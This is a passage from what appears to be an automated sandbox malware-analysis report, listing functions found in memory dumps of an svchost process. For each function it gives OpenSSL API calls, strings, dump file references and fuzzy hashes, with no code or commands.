                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: QueryVirtual
                                                                                              • String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                              • API String ID: 1804819252-157664173
                                                                                              • Opcode ID: 58d5ffc90012783a004cf7d7dd8a0b386f8571cb24a0408e1651455e6bf02d4c
                                                                                              • Instruction ID: 8be9da6754a8680321cc1caed793d364adb42589025e39e06b87e8c5ec4e3486
                                                                                              • Opcode Fuzzy Hash: 58d5ffc90012783a004cf7d7dd8a0b386f8571cb24a0408e1651455e6bf02d4c
                                                                                              • Instruction Fuzzy Hash: 2931D177792A4899FB41EF12EC44B56776ABB46BE8F488225DE0C07360EB38C143C310
                                                                                              Function 00007FFBAB4461C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • BIO_write_ex.LIBCRYPTO-3-X64(?,00007FFBAB4465AF,?,00007FFBAB4463E5,?,00007FFBAB445FD1,00000000,00007FFBAB446D2C,?,00007FFBAB448458,02000100,00007FFBAB447837,?,00007FFBAB4496C5,02000100,00007FFBAB44E4EE), ref: 00007FFBAB446273
                                                                                                • Part of subcall function 00007FFBAB4461C0: memcpy.VCRUNTIME140(?,00007FFBAB4465AF,?,00007FFBAB4463E5,?,00007FFBAB445FD1,00000000,00007FFBAB446D2C,?,00007FFBAB448458,02000100,00007FFBAB447837,?,00007FFBAB4496C5,02000100,00007FFBAB44E4EE), ref: 00007FFBAB4462B2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_write_exmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 2233345512-399585960
                                                                                              • Opcode ID: 9fe9475822be5c7edd5345edf8b85b0ce9b925777148dcc73a498bc2fa9520ec
                                                                                              • Instruction ID: 1ef0eed9c685755e99a7417c8a031b713200f17df55efa3250a0dc7202862648
                                                                                              • Opcode Fuzzy Hash: 9fe9475822be5c7edd5345edf8b85b0ce9b925777148dcc73a498bc2fa9520ec
                                                                                              • Instruction Fuzzy Hash: ED31B2B2A09B8293E62A9B75E15016EBBA0FB45B80F548075DF9C03B65CF3DE571C300
                                                                                              Function 00007FFBAB446950 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • BIO_write_ex.LIBCRYPTO-3-X64(?,00000030,00007FFBAB44685A,00000000,?,?,00007FFBAB446CD8,?,00007FFBAB448467,02000100,00007FFBAB447837,?,00007FFBAB4496C5,02000100,00007FFBAB44E4EE), ref: 00007FFBAB4469D3
                                                                                                • Part of subcall function 00007FFBAB4461C0: BIO_write_ex.LIBCRYPTO-3-X64(?,00007FFBAB4465AF,?,00007FFBAB4463E5,?,00007FFBAB445FD1,00000000,00007FFBAB446D2C,?,00007FFBAB448458,02000100,00007FFBAB447837,?,00007FFBAB4496C5,02000100,00007FFBAB44E4EE), ref: 00007FFBAB446273
                                                                                              • memcpy.VCRUNTIME140(?,00000030,00007FFBAB44685A,00000000,?,?,00007FFBAB446CD8,?,00007FFBAB448467,02000100,00007FFBAB447837,?,00007FFBAB4496C5,02000100,00007FFBAB44E4EE), ref: 00007FFBAB446A12
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_write_ex$memcpy
                                                                                              • String ID: \u00
                                                                                              • API String ID: 2000845359-188400610
                                                                                              • Opcode ID: c2f7faf3ad159e8ce584005750ab09050fbed26cbf8b54428de2030e24038d41
                                                                                              • Instruction ID: 5b540e78acf691a8d7696f6ee9eefea050c8cff9df12a42b1cecccc9e73895b0
                                                                                              • Opcode Fuzzy Hash: c2f7faf3ad159e8ce584005750ab09050fbed26cbf8b54428de2030e24038d41
                                                                                              • Instruction Fuzzy Hash: 8C2191B2A09AC193E7258B75E1502ADABA0FB45780F18C175DF9C13BA5CF79E4758300
                                                                                              Function 00007FFBAB44012B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_dump_indentO_indentO_printf
                                                                                              • String ID: %s (0x%04x)
                                                                                              • API String ID: 2723189173-3351362759
                                                                                              • Opcode ID: 1e846a7a4961b60ab853e2fbc2601ae29c44c3ba9b5bb69f43aee9e5efff950a
                                                                                              • Instruction ID: 6ff82f05c17bc105f03d2e6d0bc71e476a9cc427442285c898564d29adf65dfc
                                                                                              • Opcode Fuzzy Hash: 1e846a7a4961b60ab853e2fbc2601ae29c44c3ba9b5bb69f43aee9e5efff950a
                                                                                              • Instruction Fuzzy Hash: AA1129B2B0E58287EB2A8635E4212FD6B50EB41794F48C031CEAC067A2DE2CD162C700
                                                                                              Function 00007FFBAB44048A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_dump_indentO_indentO_printf
                                                                                              • String ID: %s (%d)
                                                                                              • API String ID: 2723189173-2206749211
                                                                                              • Opcode ID: 7941ef2ecc73a662dd177bcf290c014e0e210db29d4c5eecc4cb5782006fea4c
                                                                                              • Instruction ID: 88a5ea40c4bf45503b9bc7c73baf79da33cbe15a3dbb68d9351bf563ca436723
                                                                                              • Opcode Fuzzy Hash: 7941ef2ecc73a662dd177bcf290c014e0e210db29d4c5eecc4cb5782006fea4c
                                                                                              • Instruction Fuzzy Hash: 0011E5B2B0E69286EE668A31E0100BA6F51EB45794F44C431CFAD077A5CE3CE1A2CB40
                                                                                              Function 00007FFBAB498989 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: #
                                                                                              • API String ID: 0-1885708031
                                                                                              • Opcode ID: 755a76a62d667d4964054da24ef3d958c293f51d3ac71132f0fcb928d9ae18d7
                                                                                              • Instruction ID: 39f6fdc8cf59f513e4315df952eb95ac864496b32b48b14bd318c975523214ae
                                                                                              • Opcode Fuzzy Hash: 755a76a62d667d4964054da24ef3d958c293f51d3ac71132f0fcb928d9ae18d7
                                                                                              • Instruction Fuzzy Hash: 151192B2F0A24186FBA68B39D0D83BC2BD1EB40B44F088179CE5C0A6E5CFBD94C48311
                                                                                              Function 00007FFBAB4987DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_clear_flagsO_set_flagsR_newR_set_debug
                                                                                              • String ID: $
                                                                                              • API String ID: 4119164335-3993045852
                                                                                              • Opcode ID: e861b635a260d0521812b5d88f94463c3450914c77ecf3551f80ef991edadf37
                                                                                              • Instruction ID: f9e931a3ef84459ff4207ea3f1b2027d8e732f0d4ed09116aec4b18941595528
                                                                                              • Opcode Fuzzy Hash: e861b635a260d0521812b5d88f94463c3450914c77ecf3551f80ef991edadf37
                                                                                              • Instruction Fuzzy Hash: F30152A1A0614586FF66CB79D0C93BC2BD0EB81B54F088075CE5C4A6E5CF7D94C48321
                                                                                              Function 00007FFBAB49883D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_clear_flagsO_set_flags
                                                                                              • String ID: 0
                                                                                              • API String ID: 3946675294-4108050209
                                                                                              • Opcode ID: 8bfe953c5c865e6decd360031a0580a611bba00c4d387c5f22279d2639491d50
                                                                                              • Instruction ID: d800cd37f82074d58e802667d148213949f41d3a602398de7266b32113357a92
                                                                                              • Opcode Fuzzy Hash: 8bfe953c5c865e6decd360031a0580a611bba00c4d387c5f22279d2639491d50
                                                                                              • Instruction Fuzzy Hash: 070184B1E0A2464AFF669B39C0C53BD2B91EF81B88F0C8074CE584A6D6DF7D58D58321
                                                                                              Function 00007FFBAB42B020 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: M_construct_endM_construct_int
                                                                                              • String ID: read_ahead
                                                                                              • API String ID: 984625892-3142057140
                                                                                              • Opcode ID: 88b45bba1c2f1a6a971b24addbbe484a25df95155a7ea383780fe59d83bbd36e
                                                                                              • Instruction ID: 5f8b433d3541990b0d59565ae551c6b100176f0f28831cd8bab3033fbdf9fd7a
                                                                                              • Opcode Fuzzy Hash: 88b45bba1c2f1a6a971b24addbbe484a25df95155a7ea383780fe59d83bbd36e
                                                                                              • Instruction Fuzzy Hash: 9D112E66909BC986E7229F78D0513E9B360FB99748F449231DF9D16626EF38E189CB00
                                                                                              Function 00007FFBAB488A47 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,00000000,-00000031,00007FFBAB488692), ref: 00007FFBAB488B1C
                                                                                                • Part of subcall function 00007FFBAB487C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB472254), ref: 00007FFBAB487C3F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_set_debugR_vset_error
                                                                                              • String ID: ssl\statem\statem.c$write_state_machine
                                                                                              • API String ID: 3681713388-3145639028
                                                                                              • Opcode ID: e7b06f0b829d9ee6c3306deeb4800a49986b91a08856d2242d6c70275ab85e4d
                                                                                              • Instruction ID: ae455170abc1fbbd9e402dcfba20363498548057a039a3c5661bc66bb50fffd2
                                                                                              • Opcode Fuzzy Hash: e7b06f0b829d9ee6c3306deeb4800a49986b91a08856d2242d6c70275ab85e4d
                                                                                              • Instruction Fuzzy Hash: 11F090736197828BE743DB35E8957E83721EB45790F098073CF68436A2EE39D496C341
                                                                                              Function 00007FFBAB498A05 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_clear_flagsO_set_flags
                                                                                              • String ID: $
                                                                                              • API String ID: 3946675294-3993045852
                                                                                              • Opcode ID: 858479fff8082ae8b39c8b4f6e49fb7cef3cca36a28341a1b00d2c29114c4208
                                                                                              • Instruction ID: 576fb916d0c67bd13f3778cef493756d1a84022fc22e9a66eace23b73876f822
                                                                                              • Opcode Fuzzy Hash: 858479fff8082ae8b39c8b4f6e49fb7cef3cca36a28341a1b00d2c29114c4208
                                                                                              • Instruction Fuzzy Hash: E7F030A1F0724246FFA69A79D4953BD27819B85B44F088078CE5C4B7E6DFBE94C58310
                                                                                              Function 00007FFBAB488A98 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,00000000,-00000031,00007FFBAB488692), ref: 00007FFBAB488B1C
                                                                                                • Part of subcall function 00007FFBAB487C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB472254), ref: 00007FFBAB487C3F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_set_debugR_vset_error
                                                                                              • String ID: ssl\statem\statem.c$write_state_machine
                                                                                              • API String ID: 3681713388-3145639028
                                                                                              • Opcode ID: bb49afc650bbc74ddf2c9596240e7acfbe2fa9fc4754a5b5427dedf954be50b2
                                                                                              • Instruction ID: ca927711d4f1e2a81472a9ecf24bad0248e5a88a6d70f21c3907aacdb427e3ed
                                                                                              • Opcode Fuzzy Hash: bb49afc650bbc74ddf2c9596240e7acfbe2fa9fc4754a5b5427dedf954be50b2
                                                                                              • Instruction Fuzzy Hash: B9F090736197868AE743DB35E4557E82B20FB45754F088477CF68035A3EE39D496C300
                                                                                              Function 00007FFBAB498A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_clear_flagsO_set_flags
                                                                                              • String ID: #
                                                                                              • API String ID: 3946675294-1885708031
                                                                                              • Opcode ID: 9edbbc9cf9b2035251af165760b932159eec7fa7c28778bf96a934e8562b0b6d
                                                                                              • Instruction ID: d314a93eeebb98e982a903bc02ead731c5875938149396e066f17548a17b8253
                                                                                              • Opcode Fuzzy Hash: 9edbbc9cf9b2035251af165760b932159eec7fa7c28778bf96a934e8562b0b6d
                                                                                              • Instruction Fuzzy Hash: 2DF0A0A1F0B24246FFA69A75D0953BD2781DB84B44F088078CD5C0BBE6DFBE84C58310
                                                                                              Function 00007FFBAB49896B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_clear_flagsO_set_flags
                                                                                              • String ID:
                                                                                              • API String ID: 3946675294-3916222277
                                                                                              • Opcode ID: b51f1b6c0890579b79eb27bf295fe1aa36f5839a817513cc7c0856274dfcc6b4
                                                                                              • Instruction ID: db3dca3aeb582d0cdbf4699ee24346e16a9edba5d1ee2e67a5c2e9d4561f5587
                                                                                              • Opcode Fuzzy Hash: b51f1b6c0890579b79eb27bf295fe1aa36f5839a817513cc7c0856274dfcc6b4
                                                                                              • Instruction Fuzzy Hash: 7FF08CA1F0624246FBA69A79D0953BD27819B84B44F088078CD5C0A7E6DFBD84C58310
                                                                                              Function 00007FFBAB49881D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_clear_flagsO_set_flags
                                                                                              • String ID: $
                                                                                              • API String ID: 3946675294-3993045852
                                                                                              • Opcode ID: 858479fff8082ae8b39c8b4f6e49fb7cef3cca36a28341a1b00d2c29114c4208
                                                                                              • Instruction ID: 576fb916d0c67bd13f3778cef493756d1a84022fc22e9a66eace23b73876f822
                                                                                              • Opcode Fuzzy Hash: 858479fff8082ae8b39c8b4f6e49fb7cef3cca36a28341a1b00d2c29114c4208
                                                                                              • Instruction Fuzzy Hash: E7F030A1F0724246FFA69A79D4953BD27819B85B44F088078CE5C4B7E6DFBE94C58310
                                                                                              Function 00007FFBAB45A440 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_delete
                                                                                              • String ID: ssl\quic\quic_lcidm.c
                                                                                              • API String ID: 3239526987-3923830422
                                                                                              • Opcode ID: 232aafc997d7999e1c6c17a4d80df4341fcd33b7748c27ad3f0d600700aad4e9
                                                                                              • Instruction ID: 2cfef65775d56383acaff7a984f79ba9fe02c1976d8bfbb7a08b41e5e1602b9c
                                                                                              • Opcode Fuzzy Hash: 232aafc997d7999e1c6c17a4d80df4341fcd33b7748c27ad3f0d600700aad4e9
                                                                                              • Instruction Fuzzy Hash: 22E01AD1B4A50681EE21DBA7C89517C6361EB8CFC4F14C432EE1D8B376CE2DD4468310
                                                                                              Function 649424D0 Relevance: 5.1, APIs: 4, Instructions: 82COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32 ref: 6494251B
                                                                                              • LeaveCriticalSection.KERNEL32 ref: 64942544
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                              • String ID:
                                                                                              • API String ID: 3168844106-0
                                                                                              • Opcode ID: 851d171cd28a33aadb92ebce3c595771e2ce9737388f0198247a6dbe2b6ab19b
                                                                                              • Instruction ID: b99e11a6316d0448230eb75c665dd17718beceef0fb6c32023aa6a9d4bb3f6bc
                                                                                              • Opcode Fuzzy Hash: 851d171cd28a33aadb92ebce3c595771e2ce9737388f0198247a6dbe2b6ab19b
                                                                                              • Instruction Fuzzy Hash: 04317F727546408AE704CF39D55079963A5F785BECF188221CE298B398EB34C845CB50
                                                                                              Function 649423A0 Relevance: 5.1, APIs: 4, Instructions: 81COMMON
